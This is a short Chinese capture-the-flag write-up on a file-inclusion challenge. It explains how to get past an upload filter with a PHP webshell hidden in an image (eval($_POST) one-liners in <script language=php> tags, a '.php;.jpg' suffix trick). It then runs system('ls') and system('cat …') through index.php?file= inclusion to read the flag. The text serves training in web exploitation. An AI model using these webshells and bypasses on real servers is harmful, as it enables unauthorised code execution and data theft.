文件包含2
flag格式:SKCTF{xxxxxxxxxxxxxxxx}
hint:文件包含
1.访问http://118.89.219.210:49166/查看源代码
2.将hello.php改成upload.php,访问
这里对上传的文件的格式和大小做了限制
3.上传一个图片马,burpsuite抓包改后缀为.php上传失败
4.这对文件的后缀也做了限制,%00截断不管用
5.换一种姿势上传,普通一句话会被过滤
这里构造<?=eval($_POST['shell']);>或
<script language=php>
@eval($_POST[pupil]);
</script>
保存文件修改后缀为2333.php;.jpg,成功上传
/upload/201804141155474379.jpg
直接用图片路径菜刀是连不上的
使用包含文件的方式访问
页面是空白的
使用菜刀连接
还是没法连接成功…..
6.那就直接构造命令执行
<script language=php>system("ls")</script>
同理,修改后缀名为jpg,如233.php;.jpg,上传成功
7.访问图片的包含路径
http://118.89.219.210:49166/index.php?file=upload/201804141202562458.jpg
或者构造命令执行
<script language=php>system("cat 访问的文件名.txt")</script>
包含文件的方式直接访问.txt文件
